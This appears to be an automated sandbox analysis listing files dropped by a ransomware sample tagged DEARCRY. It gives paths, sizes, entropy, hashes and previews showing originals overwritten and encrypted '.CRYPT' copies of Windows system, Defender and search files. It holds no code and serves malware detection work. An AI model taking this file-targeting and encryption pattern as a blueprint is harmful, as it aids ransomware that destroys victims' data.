                                                            Encrypted:true
                                                            SSDEEP:98304:grbNjAco3UxvacVlUAoTbGvma8wTJDEJKI5pTigml6NsJQqxXQ6w4UD9GA15:grbNsclplUxTUmdw+r3T5RfMUDL15
                                                            MD5:D215D8A3F00AF4FB16129ABD0FA6F205
                                                            SHA1:A051E998B245844F07F37EBA15527CA03791FAA3
                                                            SHA-256:A5D3BDB88EBD4BA5A9B081B52DB11766E8A2D03AC991A9473492C9B1079D3072
                                                            SHA-512:253CCE28EAF679621E083F48905414298AEA3A880D165560E2F35962E93594CC2FC8718BEE12A79FBBC0EC8739B0CDC71FC181E9AA294AE98774CB09E436450C
                                                            Malicious:true
                                                            Preview: DEARCRY!....
                                                            C:\ProgramData\Microsoft\Provisioning\Microsoft-Desktop-Provisioning-Sequence.dat
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):2396160
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:79FFE718FEF827A04145C27314C3E3EC
                                                            SHA1:35CEECC2A0F92AEC8C826E9371C4596E9CAA1E61
                                                            SHA-256:12CA98134C8E2E00B6A12C635A610D910C1DC2183B480B72B89C530F08FEDC04
                                                            SHA-512:26FE01B7771BEAAEF06B21DC76D51CAE7DB76F4F01AB9061EBCF19DD4E577DBB145D82BBD6C50AEFC292EB5E90B06F45645A2E2B0395B6C8148A0FFAE2921FBB
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
                                                            C:\ProgramData\Microsoft\Provisioning\Microsoft-Desktop-Provisioning-Sequence.dat.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2397640
                                                            Entropy (8bit):7.999924950669925
                                                            Encrypted:true
                                                            SSDEEP:49152:FZ/nqPj3obTWMP/mci9GDFl8gsSUpNXFuQGz4wtaUSk:FZ/qgW6ji922npNM74wU7k
                                                            MD5:D5A421EE0CD0BBE04D5025F97D37E2AA
                                                            SHA1:EB08DA8C9E2A2A2176683B8E7A05003E9CF8B087
                                                            SHA-256:53349DD41E221B8F1AE56071DD0BCCB00B4DA6A52350CA4A0A02A39B96745CF1
                                                            SHA-512:11380B08F15123313CF40F69D3A6F2AC4621F793BB51CD609BCE65C86781A474F16CC8764345970899EFE3D35C6A9B076A81CF51DD37875FFFAAB90A2974B86A
                                                            Malicious:true
                                                            Preview: DEARCRY!....
                                                            C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):8454144
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:981C0CEA6DF2E122E3B913FAE0206B74
                                                            SHA1:6667F80DA36826B351B1258EA313538A004869B1
                                                            SHA-256:1B7224BAE3C0DF30A53479E44FF1844A0A7E3140AB3BDC82A469EB9B0D47EE92
                                                            SHA-512:2B08C04F0D97D9E3342A2C633D4AE2F7580A2A79FAEAFC4575552DE5B5F9D61299278618DFEC36AE61573F0820599CB77E8DA939E07B2058C0B87934E55F34C2
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
                                                            C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):8454440
                                                            Entropy (8bit):7.999979505839486
                                                            Encrypted:true
                                                            SSDEEP:196608:/goZw6kalM6PzPmZy6X1MlGSxdrgbnWVB84je:/Nu6kH8Pms6qlTTsbnWC
                                                            MD5:52FCB73BF6EA23A8E100719F28CC0943
                                                            SHA1:752B5657159CCF5FCCD585C380EF21476EADC7E5
                                                            SHA-256:5AE558CF730513492F7DEF3D186AA579A3196E37AFDE19B95B42A3EB505789A2
                                                            SHA-512:9605599FFCB672114305BFFE3838F627D775EEDD57F4217A393CB7EA09E87EF44F22676683C5BFE1D9BD9DF698620D1DF828BBE6EFBE8D377EE3A4F917B51756
                                                            Malicious:true
                                                            Preview: DEARCRY!....
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):1179648
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:15B50E0AF9982403AA6147B2C468FB07
                                                            SHA1:55BF2215BF078ECC6DE95AC9624E7B08CB2F0411
                                                            SHA-256:0D582BE25CF9D7817CFEB459FFBA6628D62ED62BC063DB374E8014CDC2DEFD5F
                                                            SHA-512:25C754E70529AD7057375B68CAB21154335012B4937FD33D1C5A3A3F2DBDDD9CF660E64D53CC589692C17A61508FC361349AD1500F1460D2E17F0D85F678FA95
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1181424
                                                            Entropy (8bit):7.999852731615662
                                                            Encrypted:true
                                                            SSDEEP:24576:bf4dsxbKwAXuuks/4rXnDPYPNMHJkTggAWe2hfzNl9X2tjk1fl5bRb:fxW9Xuuks/4DKNuJkTKWjxlCSXh
                                                            MD5:C7C4FDBE801C4C701327F65F06377329
                                                            SHA1:74599CFD811CC664132789B07C2B5B7BCB6300E0
                                                            SHA-256:8339983DD5D3503C4AB3969F12662272A9FF43E2458E52273E25766C27D9EF15
                                                            SHA-512:EE386EB15F6C079742AAB621201C692B8A0BDF0CA80488EB5C0EF7F03A11538C81575F9DD0C20E830B2A80BE216139F4AFFB2E39FED09B37893F1AF9C91643F8
                                                            Malicious:true
                                                            Preview: DEARCRY!....
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:314E20944390BDB0D80B57257C3F1571
                                                            SHA1:1F76C4B46E1EA5618431A77DF20CD1CD33B77A7F
                                                            SHA-256:156C38442089C1323D3E3BA549A6AC24341C47E8B6367BEC4740C9B8C865826E
                                                            SHA-512:C8BD5B55AE22FA12FFA48686818BFDF83EDE790CF7F7E7C113BBA8B01FB64D9C52D068117EE9AC3FB4BD5295759D73590DB2D4E56038E989A95DB8F91F200B83
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):65832
                                                            Entropy (8bit):7.997571130658828
                                                            Encrypted:true
                                                            SSDEEP:1536:RFFTGpmuuCwJVtfhKth3XGymS2zKWTo6ffujv7L8o:S8bfU3fmS2zxTJuTF
                                                            MD5:10621B9E1C940FEB1197D2B2C1E45EAD
                                                            SHA1:7588E3B1C947BCF504131E55848877A74698F57A
                                                            SHA-256:118C1A111066177E1FD79B3155CBB0941D780E13A117525D7BDFEDEFC6F50DF1
                                                            SHA-512:19F52057EAF8AA45D2E429007D85075DBB0705B9FA31FEA85DC44B98450D535AD98F91EF90DE4A8BABC98A9BFBE8E39927BC48C080024C90A52B826C8E6CF3F7
                                                            Malicious:true
                                                            Preview: DEARCRY!....
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb00001.log
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb00001.log.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):65832
                                                            Entropy (8bit):7.996544174206803
                                                            Encrypted:true
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbtmp.log
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbtmp.log.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):65832
                                                            Entropy (8bit):7.996905538024504
                                                            Encrypted:true
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\User Account Pictures\defaultuser0.dat.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1776
                                                            Entropy (8bit):7.757125649483631
                                                            Encrypted:false
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\User Account Pictures\user.dat.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):296
                                                            Entropy (8bit):7.100873396456149
                                                            Encrypted:false
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\User Account Pictures\pratesh.dat.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):296
                                                            Entropy (8bit):7.145500514395634
                                                            Encrypted:false
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\Unknown.Log
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):168
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\Unknown.Log.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):456
                                                            Entropy (8bit):7.496681045391977
                                                            Encrypted:false
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\MpDiag.bin
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):112
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\MpDiag.bin.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):408
                                                            Entropy (8bit):7.422983592322712
                                                            Encrypted:false
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-75AA7CADA49CCFA36E050EBC1592844DDD43B44E.bin
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):35616708
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-75AA7CADA49CCFA36E050EBC1592844DDD43B44E.bin.CE
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):281392
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-75AA7CADA49CCFA36E050EBC1592844DDD43B44E.bin.CE.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):281688
                                                            Entropy (8bit):7.999440863274814
                                                            Encrypted:true
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-75AA7CADA49CCFA36E050EBC1592844DDD43B44E.bin.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):39812144
                                                            Entropy (8bit):7.999995987835618
                                                            Encrypted:true
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):544768
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:6841362D352FA864D944709FE482387C
                                                            SHA1:06A481534A0CC2C1FAA493E87050A105BE7AC507
                                                            SHA-256:8023205A48CA31158E2DE7E1DB097F5B2CA773ADB5F0DF428E198DCAD4DBB1A1
                                                            SHA-512:C5F551BF9DBA649816CC45F4E556B9CB403A397258122E22DC4CA023A882BC8DAF65CD61FE2C4995F6818844E3B0AFE73F30E99EC156EC5C21D4083BB61EC5FE
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):545064
                                                            Entropy (8bit):7.999669846962036
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:8B34DF1A9D28D571C057B2A2ECCA8030
                                                            SHA1:5DD89108FAF7E314314FBEA873CBE6A4E20B881C
                                                            SHA-256:7DC0A6CF0DA72FCE26E9D10B82529C41976FC21518AD01CCE791FF51142BD3FB
                                                            SHA-512:BBECD4ADC7F540F71DDBBAECED6CC5749E069A7A318F0BC2FE48BB228A7FBDF68B8979403E0888F65471915B22FDD759FEF9569B6DA339A1355DB84DEB836234
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):114688
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:DB969CBD9E5C8C95F543116C2860E3CB
                                                            SHA1:E43CAA4378CFF595E791EC9F894C13ECA4E1889A
                                                            SHA-256:25BA42546BD187333C9C71D465B223DFDF6ACFFDDED731113D99CE8DB2F82275
                                                            SHA-512:062A0B1D90CED024BDF0170EEC9307AF529178112CE05D2198AC521971DEB313A759107D57775F02121FB72FE039BBD010C7B95CA5F80545B9E1D44192777AE9
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):116760
                                                            Entropy (8bit):7.9985306562246485
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:1E4D54A980270A9AC10F09E3F5594A30
                                                            SHA1:4773AD0F883E4C29985DA81D9A495D4288B1CC25
                                                            SHA-256:73845604F2B1B2BA76BCD0D966F5AC44A239AA33D6DFF41F88F83BA973AE2F21
                                                            SHA-512:36EEA481FE0E53CE57CB5CC946DEE2D98712C179E03EBCE4E87E054DBAF742470A24D07DF5AC412496164235040AFF5EAED625FC410079A10F4412CADFE45E74
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):292104
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:77D6EB9573ABC41939DEF71B0E67A00C
                                                            SHA1:661E1465E5BC783E93F4E45849992168057C9B21
                                                            SHA-256:612B52F387EF5898BC0560684CD0EE49B5ADFA5E7E393E226EF4AE09CC62E394
                                                            SHA-512:B8319713278415C4CFCFDF3444657BAC3829A911903DAF633C369E9C5ADFE5107DB9C97CF3A8C49BF915B12F587DBD42DEFE2D34D538C93DFDF20E8D3DD6FA47
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):292392
                                                            Entropy (8bit):7.999354641818523
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:9CE4206CFE83194D7DC7C700EA9AA36E
                                                            SHA1:6BDAEFD5ED0F3A0D00DE28C0E13149C7526F428A
                                                            SHA-256:7E371098EB017FE06E95CE5DC3596493624647A8775E31FB867FBC51A619A86F
                                                            SHA-512:B3ABE47282C88CAAAC9BB201F2879E5B60E8FDD5B449043785B3B590EEA81393CFDA751A9606EC71519BF2CC847A0D7A90C4F25346B319894EA0D27DF65C2D33
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000003.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):1170304
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:1364C805AFF555E7449F6944E4D35554
                                                            SHA1:7D7E97D7A3F3D7C3038E82385D263B29A8939399
                                                            SHA-256:C619F15FC0676B16C45129D54CFAF866C16CA4EE21A5BF44E7FC25345343A620
                                                            SHA-512:6FB299C8A262FC02728BCA687718A45A7432F065DC18537B28697321DF64832A1EA62872A5A76B3EBA75FAC43C1BB68B96AB9B03AC7998778E79AF7A168F2A2E
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000003.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1171488
                                                            Entropy (8bit):7.999834229236215
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:7553FD2AF79C6D416CEF0E887E6EAA2D
                                                            SHA1:84C6ADE56D1C5258F9384A03BCDE9EF6042079A7
                                                            SHA-256:D44BE9F19BD46FFA5F2362812A1BA03774101C03FF1E6516D156B407EE1CE669
                                                            SHA-512:411A293431CD9392A5D8133311177012699DC224AFE26207DFD0853ACD4ED263BE1F520657B8EEF0A1767B2E418D65373090361FA501DFD2B7BBBA0E86AEB115
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows\Caches\{7897343F-C962-4E34-BF39-1C4346974441}.2.ver0x0000000000000001.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):4960
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:81FB43DFBA35E683356AD3A532BA0BE0
                                                            SHA1:31BB5E7947061DC6506F623B9A71A3DA9FFE07A1
                                                            SHA-256:3B7EA9A30A6BB70A5FDF3C8B688F68DBDD3F01AD3CF33DEA5C95169D02000D64
                                                            SHA-512:2C2F1277073FD734BC01FBD241ACB26597E18B15590E200A554507F8F08A49B60D9BDAE6650688CA639D8A78713407627A74BD08EDF278160F32EC0F7039665F
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Windows\Caches\{7897343F-C962-4E34-BF39-1C4346974441}.2.ver0x0000000000000001.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6112
                                                            Entropy (8bit):7.959586711706782
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:B9CA46A1A63E80DC658C5D738C25F376
                                                            SHA1:8BA449DBDD75BBF68E046A6F7ED0A4DD0601D522
                                                            SHA-256:4CECBF0ECA5BC4FD7FB040D0DA85B090453465A9427DFCFA14171BA658E18D7F
                                                            SHA-512:3D9AA54B7E3926BF8E5FDF23EB2D77098BDCEEC66A93A4FF762AE33D34C782DDBE857E1E6DDC99F6F85C9CABF105BCF9442AB3A42DA42435AF50DC7D663BF0CA
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):2525056
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:BA31D6FD11B40FB6B31BB4442BB013D7
                                                            SHA1:8B5725602A9DBADCC50138D41E41C5FC0C8A434D
                                                            SHA-256:D147A8FC46A963807698082C1291332156F092F745777CC69B993147B3C39098
                                                            SHA-512:7349079E332A85E314C38803782CB9E4AB73E976DD91C7B9E4A8167FA8BEAA02FA783DA4A2CC81EC8725BC7D2771F5E313EF181B63538AB83A54A068F451136D
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2526240
                                                            Entropy (8bit):7.999919924975775
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:A7D04250211F78BF2DB9E3A8E099F6B5
                                                            SHA1:71D0294DF8DB9164D0D736707122745BD14056E8
                                                            SHA-256:E1D76CC9C799A2BF9505B1D253808C7849C206A74E01B03C7E5DB2B057E010E5
                                                            SHA-512:85BFF8FA91928BE754D2A31B5F6A54F9E6AEC82AEAEDE42816464F26FA3D85BB49A1AD7BF2DF8FC3ED41411ACDE5E4703C9283A8E4CBFA788C6B7BC81B241B09
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows\Caches\{FE0954D6-6B08-46D7-A05D-C49BC35F188E}.2.ver0x0000000000000001.db
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):4960
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:81FB43DFBA35E683356AD3A532BA0BE0
                                                            SHA1:31BB5E7947061DC6506F623B9A71A3DA9FFE07A1
                                                            SHA-256:3B7EA9A30A6BB70A5FDF3C8B688F68DBDD3F01AD3CF33DEA5C95169D02000D64
                                                            SHA-512:2C2F1277073FD734BC01FBD241ACB26597E18B15590E200A554507F8F08A49B60D9BDAE6650688CA639D8A78713407627A74BD08EDF278160F32EC0F7039665F
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Windows\Caches\{FE0954D6-6B08-46D7-A05D-C49BC35F188E}.2.ver0x0000000000000001.db.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6112
                                                            Entropy (8bit):7.958270405682884
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:FBF2899F948DF0996DDEFF49191AB9BA
                                                            SHA1:9A7992BBB1C82D70F2221A75F4854100E651634A
                                                            SHA-256:03D793AB1D1524A5305FAE10D1463C344198D37B30D84304A7C4DB433E6168E7
                                                            SHA-512:E57A2A5CB598B6AA845B6CFDE04D0576D17729FD38BAB3EAC41A73AE9D7BC184FF1905E31F8346D16E32C078D0EFE41BB6AE554E2AD7AB9088713B9585BF92F2
                                                            Malicious:false
                                                            Preview: DEARCRY!.......&m.wy8....9..Z..D......CrC.(.e...........#...P.u....L ..H.....N..I../.>.....68V..5.A......@..........^.t.G.....8..C.o.'...eB....?%.C.....wN..V.".E.9W...x.U...+q*'P......3.............$...]w.a....X...h"UH....s.`.7...2..b.~p....R9..).>...................sc..KK.9.G!i...f.0..`.tt..t....L5...Z..8.c5.....[.f.tM....6n...bu;....1..T...`..V./.....&6.[........@.0&.@=..G....(..>......BL........d..7.[s.....@2CMRR...*a.......N...<../..{..<. ..*,w...X...a..iI.<>...d.....H...."z...B...k............d.*....V.Q..h.F..?+A..O..@....!Q.:..d...V...3..|U.....Ej#W8..(..1.wd.(.....<G..M...5hQ..c.,.oI+..f.W..j.z..L......i...>iAq...}.....Y)/}.[@..?.;...,-.e.0...]/>q..)...7.sr.<...........|.....@...:.>D...h8..L.6.".[...v.s5.~..;..h.V....S../.C..N4.j$2.B._J.m.....n.Q.g....i..F....."...Y.... {p..Am.C..z.c.&/..pF.O...9a...Zr..3L...g.............-J.M7-...L.......0...{RE0..h.L.6.S......U.$..>"X21...D.).&8.-.....(.wH.vD(](.c.v_...0a.Q...!t...9.&/..E..#7.C..x
                                                            C:\ProgramData\Microsoft\Windows\ClipSVC\tokens.dat.bak
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):721756
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:DBD5045949F52B2A9C2A639FDDFFF098
                                                            SHA1:09F635732EEAAA5FBD41FBAFF72EE8123620DC11
                                                            SHA-256:5C4A097BEBDADB34C6A2633B37265FD5C9D424F652C5E13E4B84674F683C4CCD
                                                            SHA-512:C563F7D2CA2776F19887E179230D8A0EE76D05B4E704BFBC1A011B892C94801C0C13DB076A2F18BACC64D1D4683CDC1F82D5B0D888FF5518D7A9014A8853B17F
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows\ClipSVC\tokens.dat.bak.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):722040
                                                            Entropy (8bit):7.999743719262562
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:5EC7AC547B6EDBDF5408668F00816DCB
                                                            SHA1:488B73110BCB18DAA24FAD1EBFDEE4552B2DB821
                                                            SHA-256:F48FED3A6AACB44559C76F0FD2AF637A7084D4B6E1BA7521D65FB6EA8BE17F79
                                                            SHA-512:74EAE635A728AFE090351CE859D20E03E06C0131C7ED9F7BABAA818159753E2B056D43FB6E1A48C0AD49A86DB6AF5FAF3C7D163CFB181316CD8E1F925F978971
                                                            Malicious:true
                                                            Preview: DEARCRY!.....V......J,.....u.l...s..mn... ./..R..aA..w.........}&6....`.....m.;....eY..@.[...@N..F..f.....pv.....q....M..!..].]....E.... `{....63..h8....W......)`<...I@Tm*.6...y.i.BYv#;.Q..y..?^xH.y......y..%...........E4...j../L@.E......}5...a....1.[....\.......0i.i.}.m..X.....by$".4.......c..D....B......\.i.{..........]Qh.C...[.E5.b..H.O.M./..]W......F.T.U]j.-.mLZ..O..&....!,..\...H....&.o.m....=....N..B.ti.....:.........Q...X;.P.^w....k<.&.n.u<.....ZG..........}.z.q0..u.B..[|...T.:..-Hu2C.6.oo|.6.>p......<$.....c...g.....y.vw.o2.V+.M}....~-..^...?...sa.....X.H.O..}...6..348.).o.C.'......~..D..5..:w{....9.....<p6..Y..T..T{....y..y]G...@Y..OI..F.?..o.....cCk.....1..6.o.ua...,{3..g.8.u..~........H%..c..eD`..fn.....Oo...k.z..o.+Io.n......B.!.BD/.....V.J2..n.s........@..$Y."...h...%@..0.l......V.P3..4.~...}\:..?L.rx1....fA#52I....".*.<.A....E....{?.A.}..{........;.u|_...{.VC.`..g...#v..+...tG.g?..u7L.M...........OI.Ji......r....
                                                            C:\ProgramData\Microsoft\Windows\Start Menu Places\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):576
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:DCCC781A9692F3F37CD61A0137E23445
                                                            SHA1:E6BC6987B0F49D8B73D0DFE93F4CC175D18D2DB5
                                                            SHA-256:F7B145D7A88BF1E9797EE9DEE992EBCA6882E9CFB418C518A8AA0B6A29D94F4C
                                                            SHA-512:884DA25995C7F01DE615546691A75A796EC66E356C6DE519A8C284C446B92B38A9ACF7A548D4FDD5D41F24F2F941E94279904BB1BEE7964DE7830E1926657622
                                                            Malicious:false
